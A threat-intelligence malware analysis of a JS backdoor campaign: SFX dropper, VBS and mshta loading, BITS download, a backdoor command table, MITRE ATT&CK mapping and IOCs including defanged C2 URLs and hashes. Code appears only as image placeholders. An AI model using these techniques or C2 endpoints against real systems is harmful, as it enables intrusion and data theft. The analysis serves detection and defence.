CyberThreatIntel/Israel/APT/Unknown/26-08-19/Malware analysis 26-08-19.md
2019-09-04 18:11:37 +02:00

12 KiB

Malware analysis about unknown Israel APT campaign

Table of Contents

Malware analysis

Initial vector

The initial vector use an SFX executable, who drop a lnk file for the persistence, a vbs file and the docx file for decoys the victim.

alt text

We can also note the multiples possiblities for push the persisitence and options.

alt text

This execute the vbs file for push the persistence in the startup menu, hide it in changing these atributes and launch the persistence (lnk file)

alt text

This download the VB script and execute it by mshta call.

alt text

On the VB code, we can observed that use BITS fonctionality for download by a job the JS script to execute on the victim. Secondly, this check the architecture of the system and execute the correct path of wscript and push the windows out the screen.

Loader

We can see that use function for decode the commands with a array of bytes.

alt text

For decode the string , we use the next function used by the backdoor for decode the commands.

alt text

You can now change the encoded commands.

alt text

Once the encoded strings removed, we have the following code :

alt text As anti-forensic method, a method which can know if determiner if a debugger is present. alt text

Finally, we can observe a Wscript execution with a function splter which split for get a array of byte, convert to ASCII and after execute the script with execute call.
By the following PowerShell script, we can get the second layer that is the JS Backdoor.

alt text

JS Backdoor

Firstly, the script get the system informations about the system of the victim and send to one the list of C2 in the logical sense (not random call on the list of C2) with the suffix "/is-ready". The backdoor use a while loop for rest in communication with C2 by send pulse with the system information of the victim.

alt text

This send the data with the following structure to the C2 (Here from the Anyrun sandbox) :

C4BA3647<|>USER-PC<|>admin<|>Microsoft Windows 7 Professional <|>plus<|>nan-av<|>

We can note that the USB spread option isn't used on this sample. The structure of the reply to the C2 is the next :

[volumeserialnumber]<|>[computername]<|>[username]<|>plus<|>[AV product (yes -> name or no ->nan-av)]<|>[usbspreading option (= "")]<|>

In a second time, when a response of the C2 was given and use a swith structure for execute the command.

alt text

Now, we analyse all functions used by this switch. As first function, we can see a function used by others functions of the script and used for send the data to the C2.

alt text

We can observe after a group of functions who use the wql queries by the WMI for get the system informations, this is used by the attacker as profiling the victim.

alt text

After, a function is used by the attacker for download an executable file.

alt text

In the same idea for the attacker, a fonction which give the possiblity to read the bytes of files in a buffer and send it to the C2 is present.

alt text

The next function give to the attacker to have the list drives on the computer.

alt text

Another function can emumerate the paths of folders, files and to give in more the attributes of them.

alt text

And third function is used for get the list of the process running in the computer.

alt text

The last function exit the process with a kill signal by taskkill call.

alt text

We can resume the list of commands of the backdoor :
Command Description
execute execute a command DOS/Powershell
send Download a file to execute
site-send Function don't exist but have the same arg that send command, seems be edited function of site-send and not deleted ?
recv Read a file, put in a buffer and send to the C2
enum-driver Send the list of drives to the C2
enum-faf Get list of the folders, files and attributes and send it to the C2
enum-process Get list of the process (name, id, path of the executable) and send it on the C2
delete Function don't exist but by the params seems give to the attacker to delete folders or files
exit-process Kill the backdoor process but can't remove the persistence, an "execute" command must be performed before for delete it in the registry

Cyber kill chain

The process graph resume the cyber kill chain used by the attacker.

alt text

Cyber Threat Intel

References MITRE ATT&CK Matrix

List of all the references with MITRE ATT&CK Matrix
Enterprise tactics Technics used Ref URL
Execution T1170 - Mshta
T1064 - Scripting
https://attack.mitre.org/techniques/T1170
https://attack.mitre.org/techniques/T1064
Persistence T1197 - BITS Jobs
T1060 - Registry Run Keys / Startup Folder
https://attack.mitre.org/techniques/T1197
https://attack.mitre.org/techniques/T1060
Defense Evasion T1197 - BITS Jobs
T1170 - Mshta
T1064 - Scripting
https://attack.mitre.org/techniques/T1197
https://attack.mitre.org/techniques/T1170
https://attack.mitre.org/techniques/T1064
Discovery T1012 - Query Registry https://attack.mitre.org/techniques/T1012
Lateral Movement T1105 - Remote File Copy https://attack.mitre.org/techniques/T1105
C2 T1105 - Remote File Copy https://attack.mitre.org/techniques/T1105

Indicators Of Compromise (IOC)

List of all the Indicators Of Compromise (IOC)
Indicator Description
فضيحة جديدة لأحد قيادات حماس.exe 03d82852bbb28d1740e50206e7726c006b9b984a8309e2f203e65a67d7d3bcad
History.lnk 3853e0bf00d6dbfc574bc0564f0c90b93a66d644dd4dc8b8c00564f0b6edf581
ss.vbs 2e5f9bb1cef985eab15ad8d9072e51c71be2810fea789836b401b96bc898943b
news.docx 08fa35e25f4c7a6279a84b337d541989498d74f2c5e84cc4039d667fedc725c7
xyx.jse 32e216942f995f285947c7e7ee8cf438440c8a1e033bb27517f5e5361dafa8e8
JS Backdoor 32e216942f995f285947c7e7ee8cf438440c8a1e033bb27517f5e5361dafa8e8
adamnews.for.ug Domain requested
israanews.zz.com.ve Domain requested
mmksba.dyndns.org Domain C2
webhoptest.webhop.info Domain C2
mmksba.simple-url.com Domain C2
85.17.26.65 IP requested
66.154.103.156 IP C2
37.48.111.5 IP C2
http[:]//israanews.zz.com.ve/hw.zip.zip HTTP/HTTPS requests
http[:]//adamnews.for.ug/hwdownhww HTTP/HTTPS requests
http[:]//mmksba.dyndns.org:4455/is-ready HTTP/HTTPS requests
http[:]//webhoptest.webhop.info:4433/is-ready HTTP/HTTPS requests
http[:]//mmksba.simple-url.com:4422/is-ready HTTP/HTTPS requests
http[:]//mmksba.dyndns.org:4455/is-ready HTTP/HTTPS requests
http[:]//webhoptest.webhop.info:4433/is-sending HTTP/HTTPS requests
http[:]//mmksba.simple-url.com:4422/is-sending HTTP/HTTPS requests
http[:]//mmksba.dyndns.org:4455/is-sending HTTP/HTTPS requests
http[:]//webhoptest.webhop.info:4433/is-recving HTTP/HTTPS requests
http[:]//mmksba.simple-url.com:4422/is-recving HTTP/HTTPS requests
http[:]//mmksba.dyndns.org:4455/is-recving HTTP/HTTPS requests
http[:]//webhoptest.webhop.info:4433/is-enum-driver HTTP/HTTPS requests
http[:]//mmksba.simple-url.com:4422/is-enum-driver HTTP/HTTPS requests
http[:]//mmksba.dyndns.org:4455/is-enum-driver HTTP/HTTPS requests
http[:]//webhoptest.webhop.info:4433/is-enum-faf HTTP/HTTPS requests
http[:]//mmksba.simple-url.com:4422/is-enum-faf HTTP/HTTPS requests
http[:]//mmksba.dyndns.org:4455/is-enum-faf HTTP/HTTPS requests
http[:]//webhoptest.webhop.info:4433/is-enum-process HTTP/HTTPS requests
http[:]//mmksba.simple-url.com:4422/is-enum-process HTTP/HTTPS requests
http[:]//mmksba.dyndns.org:4455/is-enum-process HTTP/HTTPS requests
This can be exported as JSON format Export in JSON
Original tweet: https://twitter.com/Timele9527/status/1166188375109296128
Documents: